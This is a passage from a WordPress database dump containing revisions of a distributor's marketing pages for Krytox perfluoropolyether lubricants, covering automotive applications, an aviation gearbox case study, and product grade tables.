INSERT INTO `wp_posts` VALUES (2387, 2, '2016-10-07 15:16:55', '2016-10-07 15:16:55', '<strong>Krytox Automotive Information &amp; Applications</strong>\r\n\r\n<strong>High Performance Lubricants That Work in Demanding Real-Life Applications</strong>\r\n\r\nReliable high-performance fluoropolymer lubricants from Chemours can stand up to even extreme conditions. Krytox oils and greases have proven scientific and technical properties to help solve the most critical issues in the automotive industry. Superior product performance, lower overall maintenance systems cost, and a lower environmental footprint help to meet rising consumer expectations. For automotive manufacturers, this provides the opportunity to offer extended warranties and enjoy improved productivity through reduced component failure.\r\n\r\nKrytox oils and greases are based on perfluoropolyether (PFPE) oils. These synthetic fluorinated lubricants are effective from –75 °C to greater than 400 °C (–103 °F to &gt;752 °F), depending upon operating conditions and product grade. Krytox oils and greases are exceptionally safe, reliable, and offer environmental benefits as well as longer lubricant life. These oils and greases will not burn or support combustion, even in 100% liquid or gaseous oxygen, nor will they degrade or break down in the presence of aggressive chemicals. In automotive applications, Krytox oils and greases deliver low temperature starting performance, while maintaining efficacy at higher temperatures. These oils and greases can increase service life of critical components, allowing them to run more quietly and last longer, for superior, reliable performance.\r\n\r\n<strong>Vehicle Applications</strong>\r\n\r\nSee the illustration below for the many applications where Krytox has been proven effective. The non-bearing applications are shown in bold type.<img class="alignnone size-medium wp-image-2382" src="https://www.miller-stephenson.com/wp-content/uploads/2016/10/automotive-800x395.jpg" alt="automotive" width="800" height="395" />\r\n<table width="703">\r\n<tbody>\r\n<tr>\r\n<td width="444">Krytox Oils and Greases</td>\r\n<td style="text-align: center;" width="103">Viscosity, cSt</td>\r\n<td style="text-align: center;" width="156">Temperature Range, °C</td>\r\n</tr>\r\n<tr>\r\n<td>GPL 104, GPL 204, GPL 214, GPL 224, GPL 294, GPL 2E4, XP2A4</td>\r\n<td style="text-align: center;">60</td>\r\n<td style="text-align: center;">–51–179</td>\r\n</tr>\r\n<tr>\r\n<td>AUT 1045, AUT 2E45, AUT 2245, AUT 2045, AUT 2A45</td>\r\n<td style="text-align: center;">100</td>\r\n<td style="text-align: center;">–40–200</td>\r\n</tr>\r\n<tr>\r\n<td>GPL 105, GPL 205, GPL 215, GPL 225, GPL 295, GPL 2E5, XP2A5, XP2C5</td>\r\n<td style="text-align: center;">160</td>\r\n<td style="text-align: center;">–36–210</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n<strong>Krytox Automotive Products for the Automotive Industry</strong>\r\n\r\nSeveral grades of Krytox oil and grease are suitable for automotive use, depending on the application type and temperature range encountered. The table above lists the most common grades currently being used.\r\n\r\n<strong>Proven Krytox Automotive Applications</strong>\r\n\r\n<strong>Battery Vent Seals</strong>\r\n\r\nLead acid batteries provide a dependable, rechargeable source of electricity for engine start-up. As the battery recharges, hydrogen gas is produced that is then safely released through sliding vents in the battery. These vents are designed to allow the release of gas pressure without the excessive evaporation of water. The ability of the vent to slide freely is crucial to ensuring the safe release of hydrogen pressure without compromising performance through excess water evaporation. Krytox lubricants have a very low coefficient of friction, leading to excellent control and smoother gliding of the vents. Furthermore, Krytox automotive products are compatible with the plastic in the battery housing and do not degrade in the corrosive, acidic environment of the battery.\r\n\r\n<strong>Spark Plug Boots</strong>\r\n\r\nThe spark plug boot protects the spark plug from weather and prevents the unintentional grounding of the spark energy. The boot is made of a silicone rubber, which, over time, can bond with the silicon ceramic of the spark plug, fusing the boot and spark plug together. Once this occurs, the only way to remove the boot is by force, which can cause enough damage to require replacement of the entire assembly. Krytox lubricants can prevent this fusion from taking place, and they are ideal in this application because they are stable non-reactive, and long-lasting. Krytox automotive lubricants can also withstand the high temperatures and energies of the spark plug environment.\r\n\r\n<strong>Cooling System Thermostat</strong>\r\n\r\nThe automobile’s cooling system allows the engine to warm up quickly and also helps maintain its optimal operating temperature by removing heat as necessary. The system is controlled by a thermostat that determines whether coolant flows through the radiator (removing heat and allowing for optimal temperature maintenance) or is diverted back to the pump (allowing the engine to warm up more quickly). Coolant flow is controlled by a temperature-dependent valve (or thermostat) that either opens or closes, depending on need. The valve that allows coolant to flow through the radiator is opened by an actuator rod that must be able to slide without resistance. Increased friction reduces the thermostat’s ability to regulate an engine’s temperature and can result in longer warm-up time and higher engine temperatures, which will decrease performance and can lead to engine damage or failure. Proper lubrication of this rod with Krytox automotive high performance lubricant ensures long-term optimal engine performance and gas mileage.\r\n\r\n<strong>O-Ring Lubrication/Assembly Lube</strong>\r\n\r\nO-rings effectively seal many interfaces in an automobile. A lubricant is often applied to keep seals in place during assembly and allow them to assemble without damage. Choice of lubricant is critical: if the wrong lubricant is used for a given seal material, the seal could degrade prematurely and cause serious damage. Krytox lubricants are the preferred choice because they are compatible with all seal materials. Furthermore, Krytox lubricants do not contribute to seal degradation, because they do not oxidize and have greater temperature stability than the seals.\r\n\r\n<strong>EGR Valve</strong>\r\n\r\nThe exhaust gas re-circulating (EGR) valve reduces NO x formation by re-circulating some of the exhausted gas back into the engine cylinders. This lowers the peak temperatures inside the cylinder, thus reducing the rate of NO x formation. If the valve does not open enough, insufficient re-circulation takes place, and excess pollution is created. If, however, the valve sticks open, the temperature inside the cylinder can drop too much, decreasing engine performance and fuel mileage. Krytox automotive lubricants are an ideal choice, because they withstand the high temperatures and exhaust fumes experienced by the EGR valve.\r\n\r\n<strong>Engine/Turbo Cooling System</strong>\r\n\r\nSlip fittings and lubing assemblies are difficult to assemble and remove for maintenance or replacement. Krytox can solve the problem. Krytox products are compatible with most metal, plastic, and rubber interfaces, and they can reduce the friction in the assemblies, ultimately decreasing the time and effort needed to assemble parts. Furthermore, Krytox lubricants are long-lasting, ensuring that the parts will be much easier to disassemble and service throughout the lifetime of the vehicle.\r\n\r\n<strong>Windshield Wiper Motor</strong>\r\n\r\nFailure of the windshield wiper motor is a dangerous situation that can be avoided by the application of a small amount of Krytox on the bushings. Krytox has a very low coefficient of friction on startup, so a small amount leads to a significant reduction in friction. This translates into less work for the windshield wiper motor, giving it a much longer life.\r\n\r\n<strong>Super Charger Lubricant</strong>\r\n\r\nKrytox automotive grease is applied to a spring-loaded engineered plastic bushing to remove any backlash from the supercharger dual rotor drive train. The thermal and oxidative stability properties of Krytox lubricants, as well as their unique frictional characteristics, make them ideal for this type of application, delivering very long life and incredibly smooth, stick-slip free performance.\r\n\r\n<strong>Exterior Side View Mirror Mechanism</strong>\r\n\r\nThe angle of the exterior side view mirror is adjusted using small plastic gears that can easily crack or break if even minor binding occurs. The application of Krytox grease provides long-lasting lubrication, eliminating the need for regular maintenance, and ensuring continuous, reliable operation of the mirror for the life of the vehicle.\r\n\r\n<strong>Electronic Parking Brake Mechanism</strong>\r\n\r\nSome vehicle manufacturers are replacing the conventional mechanical parking brake with an electronic one, where a simple push button assisted by a small plastic gearbox engages the brake. Failure of this mechanism could be serious. Krytox automotive greases and oils can carry the gear load, won’t evaporate or oxidize, and is compatible with all plastics. As a result of these excellent lubricant properties, it is expected to work for the lifetime of the car, and can reduce both safety issues and warranty claims.\r\n\r\n<strong>Minivan Side Door Motor Clutch</strong>\r\n\r\nThis is an application requiring very specific frictional characteristics as well as performance over a long warranty life. Resistance to lubricant washout as well as tolerance to dirt are important lubricant characteristics. Krytox automotive greases and oils have once again excelled in performance in a unique and very challenging application, where traditional lubricants simply can’t meet the performance demands and extended warranty requirements.\r\n\r\n[ux_product_categories number="10" parent="0" columns="4" title="Krytox Automotive" ]\r\n\r\nTo learn more about Krytox Automotive lubricants <a href="https://www.miller-stephenson.com/chemicals/lubricants/krytox-lubricants/krytox-aut-series/">click here.</a>', 'Krytox Lubrication Points for Non-Bearing Automotive Applications', '', 'inherit', 'closed', 'closed', '', '2381-revision-v1', '', '', '2016-10-07 15:16:55', '2016-10-07 15:16:55', '', 2381, 'https://www.miller-stephenson.com/2381-revision-v1/', 0, 'revision', '', 0); 
INSERT INTO `wp_posts` VALUES (2388, 2, '2016-10-07 15:18:33', '2016-10-07 15:18:33', '<p><strong>Krytox Automotive Information &amp; Applications</strong></p>\n<p><strong>High Performance Lubricants That Work in Demanding Real-Life Applications</strong></p>\n<p>Reliable high-performance fluoropolymer lubricants from Chemours can stand up to even extreme conditions. Krytox oils and greases have proven scientific and technical properties to help solve the most critical issues in the automotive industry. Superior product performance, lower overall maintenance systems cost, and a lower environmental footprint help to meet rising consumer expectations. For automotive manufacturers, this provides the opportunity to offer extended warranties and enjoy improved productivity through reduced component failure.</p>\n<p>Krytox oils and greases are based on perfluoropolyether (PFPE) oils. These synthetic fluorinated lubricants are effective from –75 °C to greater than 400 °C (–103 °F to &gt;752 °F), depending upon operating conditions and product grade. Krytox oils and greases are exceptionally safe, reliable, and offer environmental benefits as well as longer lubricant life. These oils and greases will not burn or support combustion, even in 100% liquid or gaseous oxygen, nor will they degrade or break down in the presence of aggressive chemicals. In automotive applications, Krytox oils and greases deliver low temperature starting performance, while maintaining efficacy at higher temperatures. These oils and greases can increase service life of critical components, allowing them to run more quietly and last longer, for superior, reliable performance.</p>\n<p><strong>Vehicle Applications</strong></p>\n<p>See the illustration below for the many applications where Krytox has been proven effective. The non-bearing applications are shown in bold type.<img class="alignnone size-medium wp-image-2382" src="https://www.miller-stephenson.com/wp-content/uploads/2016/10/automotive-800x395.jpg" alt="automotive" width="800" height="395" /></p>\n<table width="703">\n<tbody>\n<tr>\n<td width="444">Krytox Oils and Greases</td>\n<td style="text-align: center;" width="103">Viscosity, cSt</td>\n<td style="text-align: center;" width="156">Temperature Range, °C</td>\n</tr>\n<tr>\n<td>GPL 104, GPL 204, GPL 214, GPL 224, GPL 294, GPL 2E4, XP2A4</td>\n<td style="text-align: center;">60</td>\n<td style="text-align: center;">–51–179</td>\n</tr>\n<tr>\n<td>AUT 1045, AUT 2E45, AUT 2245, AUT 2045, AUT 2A45</td>\n<td style="text-align: center;">100</td>\n<td style="text-align: center;">–40–200</td>\n</tr>\n<tr>\n<td>GPL 105, GPL 205, GPL 215, GPL 225, GPL 295, GPL 2E5, XP2A5, XP2C5</td>\n<td style="text-align: center;">160</td>\n<td style="text-align: center;">–36–210</td>\n</tr>\n</tbody>\n</table>\n<p><strong>Krytox Automotive Products for the Automotive Industry</strong></p>\n<p>Several grades of Krytox oil and grease are suitable for automotive use, depending on the application type and temperature range encountered. The table above lists the most common grades currently being used.</p>\n<p><strong>Proven Krytox Automotive Applications</strong></p>\n<p><strong>Battery Vent Seals</strong></p>\n<p>Lead acid batteries provide a dependable, rechargeable source of electricity for engine start-up. As the battery recharges, hydrogen gas is produced that is then safely released through sliding vents in the battery. These vents are designed to allow the release of gas pressure without the excessive evaporation of water. The ability of the vent to slide freely is crucial to ensuring the safe release of hydrogen pressure without compromising performance through excess water evaporation. Krytox lubricants have a very low coefficient of friction, leading to excellent control and smoother gliding of the vents. Furthermore, Krytox automotive products are compatible with the plastic in the battery housing and do not degrade in the corrosive, acidic environment of the battery.</p>\n<p><strong>Spark Plug Boots</strong></p>\n<p>The spark plug boot protects the spark plug from weather and prevents the unintentional grounding of the spark energy. The boot is made of a silicone rubber, which, over time, can bond with the silicon ceramic of the spark plug, fusing the boot and spark plug together. Once this occurs, the only way to remove the boot is by force, which can cause enough damage to require replacement of the entire assembly. Krytox lubricants can prevent this fusion from taking place, and they are ideal in this application because they are stable non-reactive, and long-lasting. Krytox automotive lubricants can also withstand the high temperatures and energies of the spark plug environment.</p>\n<p><strong>Cooling System Thermostat</strong></p>\n<p>The automobile’s cooling system allows the engine to warm up quickly and also helps maintain its optimal operating temperature by removing heat as necessary. The system is controlled by a thermostat that determines whether coolant flows through the radiator (removing heat and allowing for optimal temperature maintenance) or is diverted back to the pump (allowing the engine to warm up more quickly). Coolant flow is controlled by a temperature-dependent valve (or thermostat) that either opens or closes, depending on need. The valve that allows coolant to flow through the radiator is opened by an actuator rod that must be able to slide without resistance. Increased friction reduces the thermostat’s ability to regulate an engine’s temperature and can result in longer warm-up time and higher engine temperatures, which will decrease performance and can lead to engine damage or failure. Proper lubrication of this rod with Krytox automotive high performance lubricant ensures long-term optimal engine performance and gas mileage.</p>\n<p><strong>O-Ring Lubrication/Assembly Lube</strong></p>\n<p>O-rings effectively seal many interfaces in an automobile. A lubricant is often applied to keep seals in place during assembly and allow them to assemble without damage. Choice of lubricant is critical: if the wrong lubricant is used for a given seal material, the seal could degrade prematurely and cause serious damage. Krytox lubricants are the preferred choice because they are compatible with all seal materials. Furthermore, Krytox lubricants do not contribute to seal degradation, because they do not oxidize and have greater temperature stability than the seals.</p>\n<p><strong>EGR Valve</strong></p>\n<p>The exhaust gas re-circulating (EGR) valve reduces NO x formation by re-circulating some of the exhausted gas back into the engine cylinders. This lowers the peak temperatures inside the cylinder, thus reducing the rate of NO x formation. If the valve does not open enough, insufficient re-circulation takes place, and excess pollution is created. If, however, the valve sticks open, the temperature inside the cylinder can drop too much, decreasing engine performance and fuel mileage. Krytox automotive lubricants are an ideal choice, because they withstand the high temperatures and exhaust fumes experienced by the EGR valve.</p>\n<p><strong>Engine/Turbo Cooling System</strong></p>\n<p>Slip fittings and lubing assemblies are difficult to assemble and remove for maintenance or replacement. Krytox can solve the problem. Krytox products are compatible with most metal, plastic, and rubber interfaces, and they can reduce the friction in the assemblies, ultimately decreasing the time and effort needed to assemble parts. Furthermore, Krytox lubricants are long-lasting, ensuring that the parts will be much easier to disassemble and service throughout the lifetime of the vehicle.</p>\n<p><strong>Windshield Wiper Motor</strong></p>\n<p>Failure of the windshield wiper motor is a dangerous situation that can be avoided by the application of a small amount of Krytox on the bushings. Krytox has a very low coefficient of friction on startup, so a small amount leads to a significant reduction in friction. This translates into less work for the windshield wiper motor, giving it a much longer life.</p>\n<p><strong>Super Charger Lubricant</strong></p>\n<p>Krytox automotive grease is applied to a spring-loaded engineered plastic bushing to remove any backlash from the supercharger dual rotor drive train. The thermal and oxidative stability properties of Krytox lubricants, as well as their unique frictional characteristics, make them ideal for this type of application, delivering very long life and incredibly smooth, stick-slip free performance.</p>\n<p><strong>Exterior Side View Mirror Mechanism</strong></p>\n<p>The angle of the exterior side view mirror is adjusted using small plastic gears that can easily crack or break if even minor binding occurs. The application of Krytox grease provides long-lasting lubrication, eliminating the need for regular maintenance, and ensuring continuous, reliable operation of the mirror for the life of the vehicle.</p>\n<p><strong>Electronic Parking Brake Mechanism</strong></p>\n<p>Some vehicle manufacturers are replacing the conventional mechanical parking brake with an electronic one, where a simple push button assisted by a small plastic gearbox engages the brake. Failure of this mechanism could be serious. Krytox automotive greases and oils can carry the gear load, won’t evaporate or oxidize, and is compatible with all plastics. As a result of these excellent lubricant properties, it is expected to work for the lifetime of the car, and can reduce both safety issues and warranty claims.</p>\n<p><strong>Minivan Side Door Motor Clutch</strong></p>\n<p>This is an application requiring very specific frictional characteristics as well as performance over a long warranty life. Resistance to lubricant washout as well as tolerance to dirt are important lubricant characteristics. Krytox automotive greases and oils have once again excelled in performance in a unique and very challenging application, where traditional lubricants simply can’t meet the performance demands and extended warranty requirements.</p>\n[ux_product_categories ids="37,170,169,34" number="10"]\n\n<p>To learn more about Krytox Automotive lubricants <a href="https://www.miller-stephenson.com/chemicals/lubricants/krytox-lubricants/krytox-aut-series/">click here.</a></p>', 'Krytox Lubrication Points for Non-Bearing Automotive Applications', '', 'inherit', 'closed', 'closed', '', '2381-revision-v1', '', '', '2016-10-07 15:18:33', '2016-10-07 15:18:33', '', 2381, 'https://www.miller-stephenson.com/2381-revision-v1/', 0, 'revision', '', 0); 
INSERT INTO `wp_posts` VALUES (2389, 1, '2016-10-07 15:24:41', '2016-10-07 15:24:41', '<p><strong>Krytox AGL 683 Aviation Gear Box Grease - Case Study</strong></p>\n<p><strong>Aircraft Cabin Air Conditioning and Temperature Control System Application</strong></p>\n<p>Aircraft systems manufacturer improves flying experience with help from custom lubricant.</p>\n<p><strong>Aircraft systems manufacturer makes cabins more comfortable and reduces costly maintenance</strong></p>\n<p>A systems manufacturer designed a cabin air conditioning and temperature control system for the latest series of large passenger aircraft that makes flying a more comfortable experience for passengers and flight crews. Compared to traditional systems, the new system provides higher humidity, improved air quality, lower cabin pressure, and less noise in the cabin.</p>\n<p><strong>The Challenge</strong></p>\n<p>The manufacturer needed a lubricant that could meet the demanding requirements of the electromechanical actuator gearbox in the control system. Specifically, the lubricant had to provide superior lubricity over an operating temperature ranging from –55–100 °C (–67–212 °F) and perform with very limited torque. In addition, the gearbox was required to operate for extended periods of time without re-lubrication.</p>\n<p><strong>The Solution</strong></p>\n<p>Chemours developed a new product specifically designed to meet the needs of the electro-mechanical actuator gearbox. Krytox AGL 683 grease can withstand the temperature extremes of the application and provide the lowest possible torque while delivering exceptional lubricity.</p>\n<p><strong>Key Advantages</strong></p>\n<ul>\n<li>Using Krytox AGL 683 lubricant, the aircraft systems manufacturer was able to extend lubrication intervals.</li>\n<li>Chemours has the knowledge to put science to work to develop a custom-designed lubricant that met the specific needs of this critical system.</li>\n<li>Krytox AGL 683 lubricant can be used for other electro-mechanical gearbox applications.</li>\n</ul>\n<p>[product id="1072" columns="1"]</p>\n<p>To learn more about Krytox AGL 683, please <a href="https://www.miller-stephenson.com/product/agl-683/">click here.</a></p>\n<p>&nbsp;</p>', 'Krytox AGL 683 Case Study - Gearbox Grease', '', 'inherit', 'closed', 'closed', '', '2311-revision-v1', '', '', '2016-10-07 15:24:41', '2016-10-07 15:24:41', '', 2311, 'https://www.miller-stephenson.com/2311-revision-v1/', 0, 'revision', '', 0); 
INSERT INTO `wp_posts` VALUES (2390, 2, '2016-10-07 16:00:04', '2016-10-07 16:00:04', '<h1><strong>Krytox™ Performance Lubricants | Automotive Lubricants specifically designed for Automotive needs</strong></h1>\r\nPowered by Chemours Science… Over the last fifty years, Krytox™ automotive lubricants have helped customers outpace the competition by bringing customized and innovative solutions into an increasingly competitive automotive industry.\r\n\r\nWhatever your engineering challenge—longer part life, extreme temperatures, reduced failures—Krytox™ performance lubricants can help. At Chemours, we put our science to work to produce lubricants that can stand up under the extremely demanding conditions of today’s engineering design standards.\r\n<h4><strong>Advanced Solutions for the Automotive Industry | Automotive Lubricants</strong></h4>\r\nKrytox™ performance lubricants offer a wide range of high quality, high performance lubricants to address the most challenging and complex requirements of original equipment manufacturers (OEMs) and world-class Tier One suppliers.\r\n\r\nOur family of oils, greases, and coatings will provide long-term operational excellence and high performance lubrication in extreme operating conditions.\r\n\r\nAutomotive design engineers have learned that specifying Krytox™ lubricants during the design phase can provide OEMs with significant cost savings. By lengthening the life of critical components and improving consumer satisfaction, Krytox™ lubricants help reduce repair costs and potentially save millions in warranty claims.\r\n<h4><strong>Longer Lasting Lubrication</strong></h4>\r\nAutomakers are striving for extended warranties, expecting longer intervals between vehicle service visits and very limited relubrication operations. Krytox™ lubricants have provided state-of-the art performance for mechanical systems, such as gearboxes, bearings, chains, seals, actuators, valves, and other components. Krytox™ lubricants don’t oxidize; they provide excellent lubricity and a high viscosity index through a broad range of viscosity grades. Most applications where Krytox™ lubricants are specified are considered by OEMs to be lubricated for the expected lifetime of the vehicle.\r\n<h4><strong>The Right Choice for Your Design Challenge</strong></h4>\r\nKrytox™ oils and greases are based on perfluoropolyether (PFPE) oils, with a full range of viscosities available. These synthetic fluorinated lubricants are effective from -75 °C to greater than 400 °C (-103 to &gt;752 °F), depending upon operating conditions and product grade.\r\n<h4><strong>Krytox™ performance lubricants have properties that reduce impact on the environment:</strong></h4>\r\n<ul>\r\n 	<li>Krytox™ products are fully synthetic—not petroleum-based—and totally inert, so Krytox™ oils and greases do not react with anything in the environment. Unlike other automotive lubricants, at temperatures under 350 ºC (662 °F), Krytox™ oil does not oxidize or break down into other substances that could be harmful.</li>\r\n 	<li>Krytox™ lubricants do not contain any volatile organic compounds (VOCs), according to the U.S. EPA definition. Our full fluorinated automotive lubricants are made of fluorine, oxygen, and carbon only.</li>\r\n 	<li>Krytox™ products have a very long service life. This means that products do not have to be replaced and disposed of frequently, which reduces waste.</li>\r\n 	<li>Because the Krytox™ molecule stays intact, the oils can be recycled if they become contaminated. The recycled products can then be returned to the customer for reuse.</li>\r\n 	<li>Krytox™ oils and greases are not considered hazardous wastes as manufactured under the U.S. EPA Resource and Recovery Conservation Act guidelines. However, treatment, storage, transportation, recycling, and disposal of these products must be in accordance with applicable federal, state/provincial, and local regulations.</li>\r\n</ul>\r\n<h4><strong>The Right Choice for Our Environment</strong></h4>\r\nProtection of the environment and people is a core value of Chemours. Our sustainability goals go beyond traditional footprint reduction to include goals that tie our business growth to the development of safer and environmentally improved new products and sustainable solutions.\r\n\r\nKrytox™ lubricants provide longer lasting lubrication, which lowers the frequency of relubrication; therefore, reducing the use of materials and reducing waste—important steps in helping to reduce product impact on the environment.\r\n<h4><strong>Effective Over a Wide Temperature Range</strong></h4>\r\nKrytox™ greases typically last 5-50 times longer than standard greases. One common bearing test that demonstrates the extreme performance of various grades of Krytox™ grease is the ASTM D-3336 test method, where heating/cooling test cycles are continued until failure or the completion of a specified number of hours of running time.\r\n\r\nTest results have shown that Krytox™ greases can continue to perform beyond thousands of hours and at temperatures beyond the range specified for most applications—even outlasting the tester itself.\r\n\r\nFigure 1 Ball Bearing Grease Performance Test with Krytox™ Greases\r\n<table width="1074">\r\n<tbody>\r\n<tr>\r\n<td width="250"><strong>Grade</strong></td>\r\n<td style="text-align: center;" width="206"><strong>Recommended Temperature Range</strong></td>\r\n<td style="text-align: center;" width="206"><strong>Viscosity 40°C/100°C</strong></td>\r\n<td style="text-align: center;" width="206"><strong>Test Temperature</strong></td>\r\n<td style="text-align: center;" width="206"><strong>Life, hr</strong></td>\r\n</tr>\r\n<tr>\r\n<td><a href="https://www.miller-stephenson.com/product/krytox-gpl-224/">Krytox™ GPL 224</a></td>\r\n<td style="text-align: center;">-51–179 °C (-60–354 °F)</td>\r\n<td style="text-align: center;">60/9</td>\r\n<td style="text-align: center;">180 °C (356 °F)</td>\r\n<td style="text-align: center;">4,900+</td>\r\n</tr>\r\n<tr>\r\n<td><a href="https://www.miller-stephenson.com/product/krytox-aut-2245/">Krytox™ AUT 2245</a></td>\r\n<td style="text-align: center;">-40–200 °C (-40–392 °F)</td>\r\n<td style="text-align: center;">100/12.3</td>\r\n<td style="text-align: center;">200 °C (392 °F)</td>\r\n<td style="text-align: center;">5,500+</td>\r\n</tr>\r\n<tr>\r\n<td><a href="https://www.miller-stephenson.com/product/krytox-gpl-225/">Krytox™ GPL 225</a></td>\r\n<td style="text-align: center;">-36–204 °C (-33–399 °F)</td>\r\n<td style="text-align: center;">160/18</td>\r\n<td style="text-align: center;">200 °C (392 °F)</td>\r\n<td style="text-align: center;">5,000+</td>\r\n</tr>\r\n<tr>\r\n<td><a href="https://www.miller-stephenson.com/product/krytox-xht-ac/">Krytox™ XHT AC</a></td>\r\n<td style="text-align: center;">-20–300 °C (-4–572 °F)</td>\r\n<td style="text-align: center;">500/47</td>\r\n<td style="text-align: center;">250 °C (482 °F)</td>\r\n<td style="text-align: center;">2,000+</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n<h4><strong>Compatibility with Elastomers and Plastics</strong></h4>\r\nKrytox™ performance lubricants are compatible with the following common elastomers and plastics, as well as many more:\r\n<ul>\r\n 	<li>Fluorosilicone</li>\r\n 	<li>Hytrel® Polyester Elastomer</li>\r\n 	<li>Delrin® Acetal</li>\r\n 	<li>Ethylacrylate</li>\r\n 	<li>Methyl Silicone</li>\r\n 	<li>Butyl 325</li>\r\n 	<li>Neoprene WRT</li>\r\n 	<li>Kalrez® Fluoroelastomer*</li>\r\n 	<li>Zytel® Nylon</li>\r\n 	<li>Viton™ A Fluoroelastomer</li>\r\n 	<li>Nycar 100 (Buna N)</li>\r\n 	<li>Vespel®</li>\r\n 	<li>Urethane</li>\r\n 	<li>Hypalon® Synthetic Rubber</li>\r\n 	<li>EPT Peroxide Cure</li>\r\n 	<li>Hydrocarbon Rubber</li>\r\n 	<li>Teflon™ Fluoropolymer</li>\r\n</ul>\r\n<h4><strong>Compatibility with Metals</strong></h4>\r\nBecause of their low surface tensions, Krytox™ oils and greases easily lubricate metallic surfaces. Krytox™ lubricants are chemically inert and, therefore, have no adverse effect on metals when the temperature is below 288 °C (550 ºF).\r\n\r\nAbove this point, Krytox™ lubricants will be the best-in-class choice for many alloy steels, stainless steels, titanium alloy, nickel alloy, and cobalt alloy.\r\n<h4><strong>Robust Electrical Properties</strong></h4>\r\nKrytox™ oils are good insulators due to fundamental properties. Our synthetic fluorinated automotive lubricants are chemically inert, insoluble in most common solvents, and nonflammable.\r\n<h4><strong>Advanced Rust and Corrosion Protection from Environmental Challenges</strong></h4>\r\nKrytox™ lubricants are not sensitive to aggressive weather conditions, such as rain, snow, ice, dust, or grit, and they are extremely resistant to the harsh underhood chemical environment of fuel, coolant, brake fluid, engine oil, and washer solvent.\r\n<h4><strong>Cost-Effective</strong></h4>\r\nKrytox™ lubricants provide OEMs with significant cost savings when specified for use during the design phase. By lengthening the life of critical components, Krytox™ automotive lubricants reduce repair costs and potentially save millions in warranty claims.\r\n\r\nFigure 2 Krytox™ Performance Lubricants Product Range\r\n<table width="868">\r\n<tbody>\r\n<tr>\r\n<td width="250">Typical Automotive Lubricants Grade</td>\r\n<td style="text-align: center;" width="206">Description</td>\r\n<td style="text-align: center;" width="206">Base Oil Viscosity, cSt</td>\r\n<td style="text-align: center;" width="206">Useful Temperature Range</td>\r\n</tr>\r\n<tr>\r\n<td><a href="https://www.miller-stephenson.com/product/krytox-gpl-104/">Krytox™ GPL 104</a></td>\r\n<td>Clear, colorless oil</td>\r\n<td style="text-align: center;">60</td>\r\n<td style="text-align: center;">-51–179 °C (-60–354 °F)</td>\r\n</tr>\r\n<tr>\r\n<td><a href="https://www.miller-stephenson.com/product/krytox-gpl-105/">Krytox™ GPL 105</a></td>\r\n<td>Clear, colorless oil</td>\r\n<td style="text-align: center;">160</td>\r\n<td style="text-align: center;">-36–210 °C (-33–410 °F)</td>\r\n</tr>\r\n<tr>\r\n<td>Krytox™ AUT 1045</td>\r\n<td>Clear, colorless oil</td>\r\n<td style="text-align: center;">100</td>\r\n<td style="text-align: center;">-40–200 °C (-40–392 °F)</td>\r\n</tr>\r\n<tr>\r\n<td><a href="https://www.miller-stephenson.com/product/krytox-gpl-204/">Krytox™ GPL 204</a></td>\r\n<td>White, buttery additive-free grease</td>\r\n<td style="text-align: center;">60</td>\r\n<td style="text-align: center;">-51–179 °C (-60–354 °F)</td>\r\n</tr>\r\n<tr>\r\n<td><a href="https://www.miller-stephenson.com/product/krytox-gpl-214/">Krytox™ GPL 214</a></td>\r\n<td>Grease with extreme pressure additive</td>\r\n<td style="text-align: center;">60</td>\r\n<td style="text-align: center;">-51–179 °C (-60–354 °F)</td>\r\n</tr>\r\n<tr>\r\n<td><a href="https://www.miller-stephenson.com/product/krytox-gpl-224/">Krytox™ GPL 224</a></td>\r\n<td>White, buttery grease with sodium nitrite anti-corrosion additive</td>\r\n<td style="text-align: center;">60</td>\r\n<td style="text-align: center;">-51–179 °C (-60–354 °F)</td>\r\n</tr>\r\n<tr>\r\n<td>Krytox™ GPL 294</td>\r\n<td>Grease with extreme pressure and anti-corrosion additives</td>\r\n<td style="text-align: center;">60</td>\r\n<td style="text-align: center;">-51–179 °C (-60–354 °F)</td>\r\n</tr>\r\n<tr>\r\n<td><a href="https://www.miller-stephenson.com/product/krytox-xp-2a4/">Krytox™ XP2A4</a></td>\r\n<td>Grease with soluble additive corrosion inhibitor</td>\r\n<td style="text-align: center;">60</td>\r\n<td style="text-align: center;">-51–179 °C (-60–354 °F)</td>\r\n</tr>\r\n<tr>\r\n<td><a href="https://www.miller-stephenson.com/product/krytox-aut-2045/">Krytox™ AUT 2045</a></td>\r\n<td>White, buttery additive-free grease</td>\r\n<td style="text-align: center;">100</td>\r\n<td style="text-align: center;">-40–200 °C (-40–392 °F)</td>\r\n</tr>\r\n<tr>\r\n<td><a href="https://www.miller-stephenson.com/product/krytox-aut-2245/">Krytox™ AUT 2245</a></td>\r\n<td>White, buttery grease with sodium nitrite anti-corrosion additive</td>\r\n<td style="text-align: center;">100</td>\r\n<td style="text-align: center;">-40–200 °C (-40–392 °F)</td>\r\n</tr>\r\n<tr>\r\n<td><a href="https://www.miller-stephenson.com/product/krytox-aut-2e45/">Krytox™ AUT 2E45</a></td>\r\n<td>Grease with sodium nitrite-free anti-corrosion additive</td>\r\n<td style="text-align: center;">100</td>\r\n<td style="text-align: center;">-40–200 °C (-40–392 °F)</td>\r\n</tr>\r\n<tr>\r\n<td><a href="https://www.miller-stephenson.com/product/krytox-aut-2a45/">Krytox™ AUT 2A45</a></td>\r\n<td>Grease with soluble additive corrosion inhibitor</td>\r\n<td style="text-align: center;">100</td>\r\n<td style="text-align: center;">-40–200 °C (-40–392 °F)</td>\r\n</tr>\r\n<tr>\r\n<td><a href="https://www.miller-stephenson.com/product/krytox-gpl-205/">Krytox™ GPL 205</a></td>\r\n<td>White, buttery additive-free grease</td>\r\n<td style="text-align: center;">160</td>\r\n<td style="text-align: center;">-36–210 °C (-33–410 °F)</td>\r\n</tr>\r\n<tr>\r\n<td><a href="https://www.miller-stephenson.com/product/krytox-gpl-215/">Krytox™ GPL 215</a></td>\r\n<td>Grease with extreme pressure additive</td>\r\n<td style="text-align: center;">160</td>\r\n<td style="text-align: center;">-36–210 °C (-33–410 °F)</td>\r\n</tr>\r\n<tr>\r\n<td><a href="https://www.miller-stephenson.com/product/krytox-gpl-225/">Krytox™ GPL 225</a></td>\r\n<td>White, buttery grease with sodium nitrite anti-corrosion additive</td>\r\n<td style="text-align: center;">160</td>\r\n<td style="text-align: center;">-36–210 °C (-33–410 °F)</td>\r\n</tr>\r\n<tr>\r\n<td>Krytox™ GPL 295</td>\r\n<td>Grease with extreme pressure and anti-corrosion additives</td>\r\n<td style="text-align: center;">160</td>\r\n<td style="text-align: center;">-36–210 